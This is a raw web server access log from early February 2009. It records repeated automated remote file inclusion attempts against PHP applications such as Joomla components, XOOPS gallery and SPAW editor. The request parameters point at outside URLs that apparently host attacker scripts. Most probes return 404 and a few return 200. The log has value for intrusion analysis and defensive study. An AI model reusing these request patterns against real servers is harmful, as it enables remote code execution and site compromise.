77.221.130.21 - - [04/Feb/2009:23:54:29 -0600] "GET /logs/access_log.1212364800/newspublish//include.php?path[docroot]=http://www.tpshanshui.com.tw/alat/id2.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.221.130.21 - - [04/Feb/2009:23:54:47 -0600] "GET /logs/access_log.1206230400/newspublish//include.php?path[docroot]=http://www.tpshanshui.com.tw/alat/id2.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.232.84.2 - - [04/Feb/2009:23:55:05 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows CE 9.21; rv:1.8b9) Gecko/20050720 Minimo/0.007"
72.3.139.15 - - [04/Feb/2009:23:55:07 -0600] "GET /logs/access_log.1216684800//config/dbutil.bck.php?confdir=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.3.139.15 - - [04/Feb/2009:23:55:07 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.3.139.15 - - [04/Feb/2009:23:55:07 -0600] "GET //config/dbutil.bck.php?confdir=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.3.139.15 - - [04/Feb/2009:23:55:07 -0600] "GET /logs/access_log.1214092800//config/dbutil.bck.php?confdir=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
80.25.82.126 - - [04/Feb/2009:23:55:19 -0600] "GET /logs/access_log.1215907200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://canalteresina.org/TT?? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
72.3.139.15 - - [04/Feb/2009:23:55:19 -0600] "GET /logs/access_log.1210809600//config/dbutil.bck.php?confdir=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.3.139.15 - - [04/Feb/2009:23:55:22 -0600] "GET /logs/access_log.1217203200//config/dbutil.bck.php?confdir=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.232.84.2 - - [04/Feb/2009:23:55:36 -0600] "GET /logs/access_log.1217203200//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows CE 9.21; rv:1.8b9) Gecko/20050720 Minimo/0.007"
77.232.84.2 - - [04/Feb/2009:23:55:36 -0600] "GET //config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows CE 9.21; rv:1.8b9) Gecko/20050720 Minimo/0.007"
87.249.116.188 - - [04/Feb/2009:23:55:36 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
87.249.116.188 - - [04/Feb/2009:23:55:36 -0600] "GET //config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
87.249.116.188 - - [04/Feb/2009:23:55:36 -0600] "GET /logs/access_log.1216684800//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
77.221.130.21 - - [04/Feb/2009:23:56:02 -0600] "GET /logs/access_log.1212364800%20%20/newspublish//include.php?path[docroot]=http://www.tpshanshui.com.tw/alat/id2.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
77.221.130.21 - - [04/Feb/2009:23:56:02 -0600] "GET /logs/access_log.1212364800%20%20/newspublish//include.php?path[docroot]=http://www.tpshanshui.com.tw/alat/id2.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
77.221.130.21 - - [04/Feb/2009:23:56:11 -0600] "GET /logs/access_log.1206230400%20%20/newspublish//include.php?path[docroot]=http://www.tpshanshui.com.tw/alat/id2.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
77.221.130.21 - - [04/Feb/2009:23:56:11 -0600] "GET /logs/access_log.1206230400%20%20/newspublish//include.php?path[docroot]=http://www.tpshanshui.com.tw/alat/id2.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.101.4.49 - - [04/Feb/2009:23:56:18 -0600] "GET /logs/access_log.1218758400//include/wysiwyg/spaw_control.class.php?spaw_root=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
87.101.4.49 - - [04/Feb/2009:23:56:18 -0600] "GET //include/wysiwyg/spaw_control.class.php?spaw_root=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
87.101.4.49 - - [04/Feb/2009:23:56:18 -0600] "GET /logs//include/wysiwyg/spaw_control.class.php?spaw_root=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
87.249.116.188 - - [04/Feb/2009:23:57:31 -0600] "GET /logs/access_log.1217203200//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
222.236.44.32 - - [04/Feb/2009:23:57:39 -0600] "GET /logs/access_log.1219536000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
222.236.44.32 - - [04/Feb/2009:23:57:40 -0600] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
222.236.44.32 - - [04/Feb/2009:23:57:41 -0600] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
87.101.4.49 - - [04/Feb/2009:23:58:30 -0600] "GET /logs/access_log.1210291200//include/wysiwyg/spaw_control.class.php?spaw_root=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
222.236.44.32 - - [04/Feb/2009:23:58:34 -0600] "GET /logs/access_log.1217203200//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
192.134.106.1 - - [04/Feb/2009:23:58:39 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
192.134.106.1 - - [04/Feb/2009:23:58:39 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
192.134.106.1 - - [04/Feb/2009:23:58:45 -0600] "GET //webcalendar/tools/send_reminders.php?noSet=0&includedir=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
192.134.106.1 - - [04/Feb/2009:23:58:45 -0600] "GET /logs//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.232.84.2 - - [04/Feb/2009:23:59:06 -0600] "GET /logs/access_log.1212364800//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows CE 9.21; rv:1.8b9) Gecko/20050720 Minimo/0.007"
209.126.131.239 - - [05/Feb/2009:00:00:19 -0600] "GET /logs/access_log.1216684800//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.126.131.239 - - [05/Feb/2009:00:00:19 -0600] "GET //config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.126.131.239 - - [05/Feb/2009:00:00:19 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
91.186.27.166 - - [05/Feb/2009:00:01:02 -0600] "GET //config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
91.186.27.166 - - [05/Feb/2009:00:01:02 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
91.186.27.166 - - [05/Feb/2009:00:01:02 -0600] "GET /logs/access_log.1216684800//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
222.231.47.130 - - [05/Feb/2009:00:01:06 -0600] "GET /logs/access_log.1219536000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
91.186.27.166 - - [05/Feb/2009:00:01:07 -0600] "GET /logs/access_log.1217203200//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
222.231.47.130 - - [05/Feb/2009:00:01:07 -0600] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
222.231.47.130 - - [05/Feb/2009:00:01:08 -0600] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
72.3.139.15 - - [05/Feb/2009:00:01:21 -0600] "GET /logs/access_log.1212364800//config/dbutil.bck.php?confdir=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.232.84.2 - - [05/Feb/2009:00:01:25 -0600] "GET /logs/access_log.1216080000//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows CE 9.21; rv:1.8b9) Gecko/20050720 Minimo/0.007"
87.101.4.49 - - [05/Feb/2009:00:01:25 -0600] "GET /logs/access_log.1216080000//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:01:25 -0600] "GET //include/wysiwyg/spaw_control.class.php?spaw_root=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:01:26 -0600] "GET /logs//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
72.3.139.15 - - [05/Feb/2009:00:01:46 -0600] "GET /logs/access_log.1216080000//config/dbutil.bck.php?confdir=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
88.191.95.106 - - [05/Feb/2009:00:01:51 -0600] "GET /logs/access_log.1214179200%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:01:51 -0600] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:01:51 -0600] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.126.131.239 - - [05/Feb/2009:00:01:55 -0600] "GET /logs/access_log.1217203200//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
222.231.47.130 - - [05/Feb/2009:00:02:08 -0600] "GET /logs/access_log.1217203200//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
87.249.116.188 - - [05/Feb/2009:00:02:48 -0600] "GET /logs/access_log.1212364800//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
87.249.116.188 - - [05/Feb/2009:00:02:58 -0600] "GET /logs/access_log.1216080000//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
88.191.95.106 - - [05/Feb/2009:00:03:26 -0600] "GET /logs/access_log.1210896000%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
87.101.4.49 - - [05/Feb/2009:00:04:05 -0600] "GET //include/wysiwyg/spaw_control.class.php?spaw_root=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
209.126.131.239 - - [05/Feb/2009:00:04:22 -0600] "GET /logs/access_log.1214092800//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
88.191.95.106 - - [05/Feb/2009:00:04:25 -0600] "GET /logs/access_log.1214179200/components/com_performs/performs.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
209.126.131.239 - - [05/Feb/2009:00:04:26 -0600] "GET /logs/access_log.1210809600//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
91.186.27.166 - - [05/Feb/2009:00:04:44 -0600] "GET /logs/access_log.1212364800//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
88.191.95.106 - - [05/Feb/2009:00:04:46 -0600] "GET /logs/access_log.1219536000/components/com_performs/performs.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
91.186.27.166 - - [05/Feb/2009:00:04:57 -0600] "GET /logs/access_log.1216080000//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
87.101.4.49 - - [05/Feb/2009:00:07:08 -0600] "GET /logs/access_log.1216080000//include/wysiwyg/spaw_control.class.php?spaw_root=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:07:08 -0600] "GET /logs//include/wysiwyg/spaw_control.class.php?spaw_root=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:07:08 -0600] "GET //include/wysiwyg/spaw_control.class.php?spaw_root=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
209.126.131.239 - - [05/Feb/2009:00:07:44 -0600] "GET /logs/access_log.1212364800//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
70.85.146.66 - - [05/Feb/2009:00:07:45 -0600] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hanbol.es.kr/data/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
70.85.146.66 - - [05/Feb/2009:00:07:45 -0600] "GET /logs/access_log.1216944000%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hanbol.es.kr/data/id1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
70.85.146.66 - - [05/Feb/2009:00:07:45 -0600] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hanbol.es.kr/data/id1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
76.74.129.144 - - [05/Feb/2009:00:08:05 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
76.74.129.144 - - [05/Feb/2009:00:08:05 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
76.74.129.144 - - [05/Feb/2009:00:08:10 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
70.85.146.66 - - [05/Feb/2009:00:08:22 -0600] "GET /logs/access_log.1219536000%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hanbol.es.kr/data/id1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
148.245.102.115 - - [05/Feb/2009:00:08:35 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
148.245.102.115 - - [05/Feb/2009:00:08:35 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
148.245.102.115 - - [05/Feb/2009:00:08:35 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
76.74.129.144 - - [05/Feb/2009:00:08:44 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/idv6.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
76.74.129.144 - - [05/Feb/2009:00:08:46 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/idv6.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
76.74.129.144 - - [05/Feb/2009:00:08:52 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/idv6.txt?%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
84.21.71.133 - - [05/Feb/2009:00:08:54 -0600] "GET /logs/access_log.1217203200///////?dir_ws=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:00:08:54 -0600] "GET ///////?dir_ws=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 200 1248 "-""libwww-perl/5.805"
200.13.253.154 - - [05/Feb/2009:00:08:57 -0600] "GET /logs/access_log.1217203200//admin/business_inc/saveserver.php?thisdir=http://www.kazandoska.ru/idi.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
200.13.253.154 - - [05/Feb/2009:00:08:57 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://www.kazandoska.ru/idi.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
200.13.253.154 - - [05/Feb/2009:00:08:57 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.kazandoska.ru/idi.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:00:08:58 -0600] "GET /logs///////?dir_ws=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 200 117470 "-""libwww-perl/5.805"
200.13.253.154 - - [05/Feb/2009:00:09:03 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://www.kazandoska.ru/idi.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
200.13.253.154 - - [05/Feb/2009:00:09:03 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.kazandoska.ru/idi.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
200.13.253.154 - - [05/Feb/2009:00:09:03 -0600] "GET /logs/access_log.1217203200//admin/business_inc/saveserver.php?thisdir=http://www.kazandoska.ru/idi.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
209.126.131.239 - - [05/Feb/2009:00:09:04 -0600] "GET /logs/access_log.1216080000//config/dbutil.bck.php?confdir=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
84.21.71.133 - - [05/Feb/2009:00:09:15 -0600] "GET /logs/access_log.1209427200///////?dir_ws=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
200.13.253.154 - - [05/Feb/2009:00:09:15 -0600] "GET /logs/access_log.1217203200//admin/business_inc/saveserver.php?thisdir=http://www.kazandoska.ru/idi.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
200.13.253.154 - - [05/Feb/2009:00:09:15 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.kazandoska.ru/idi.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
200.13.253.154 - - [05/Feb/2009:00:09:19 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://www.kazandoska.ru/idi.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
148.245.102.115 - - [05/Feb/2009:00:09:31 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/idv6.txt?%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
148.245.102.115 - - [05/Feb/2009:00:09:31 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/idv6.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
148.245.102.115 - - [05/Feb/2009:00:09:31 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/idv6.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
200.13.253.154 - - [05/Feb/2009:00:09:51 -0600] "GET /logs/access_log.1216339200//admin/business_inc/saveserver.php?thisdir=http://www.kazandoska.ru/idi.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
200.13.253.154 - - [05/Feb/2009:00:10:06 -0600] "GET /logs/access_log.1216339200//admin/business_inc/saveserver.php?thisdir=http://www.kazandoska.ru/idi.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
89.248.110.224 - - [05/Feb/2009:00:10:21 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 350 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
89.248.110.224 - - [05/Feb/2009:00:10:21 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
89.248.110.224 - - [05/Feb/2009:00:10:21 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 328 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
200.13.253.154 - - [05/Feb/2009:00:10:38 -0600] "GET /logs/access_log.1216339200//admin/business_inc/saveserver.php?thisdir=http://www.kazandoska.ru/idi.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
148.245.102.115 - - [05/Feb/2009:00:11:06 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
148.245.102.115 - - [05/Feb/2009:00:11:06 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
148.245.102.115 - - [05/Feb/2009:00:11:06 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
76.74.129.144 - - [05/Feb/2009:00:11:42 -0600] "GET /logs/access_log.1213660800//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
